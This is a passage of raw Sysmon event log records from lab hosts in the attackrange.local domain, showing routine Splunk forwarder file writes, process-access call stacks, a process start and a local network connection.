Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D203D84B6327833ACAC80E971E510B05,SHA256=E7219B9305A68E7E24D54E7CEFDD93AF7E2DB8FD85430E0169FE09A9E21BB9CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080992Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:32.127{2FDD8D40-B1CF-615A-3501-00000000FD01}1723348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:32.014{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=99AC9CCC6D5FEEDCFB86CF523BEC4EAE,SHA256=150B1EB6CECF5C3A02D7F3C808689E266F284E63AC44082ACC4910DDC3C51280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103131Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:33.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B936D61B32FAD5AC4628FBDE203F0326,SHA256=DC318D68073B12F2C5BE8E0F557EC18C43147AB51ACEEEA7F67BC8F6D57D5F6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081010Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:30.648{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49999-false10.0.1.12-8000- 23542300x800000000000000081009Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.924{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44661CD66AD1057B72E6C77536421AEF,SHA256=8ACD57BEFCDDF8BBB2888FBC574921ACB6EF31992A3906EDB7271FC445DAAAD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081008Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1D1-615A-3601-00000000FD01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081007Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081006Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081005Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081004Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081003Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081002Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081001Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081000Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080999Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080998Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B1D1-615A-3601-00000000FD01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080997Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.143{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1D1-615A-3601-00000000FD01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080996Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:33.144{2FDD8D40-B1D1-615A-3601-00000000FD01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103132Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:34.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE58EC21962EAB3E9E95EE1C2C8ABC35,SHA256=DA62B0926DE1A2D7DD4F0182C9306F277AF86B67FC5D965690BDADEE2BAE2F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081026Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.940{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=495F747582C966E37B1DAEFF9DC7F4BE,SHA256=AFD0FC1DEEA0A1F95CE0A9D5FF779E1BDCD0FFA6B6F573CADE1F06E1047BDBEE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081025Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.940{2FDD8D40-B1D2-615A-3701-00000000FD01}8003112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081024Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1D2-615A-3701-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081023Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081022Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081021Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081020Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081019Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081018Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081017Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:34.737{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081016Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 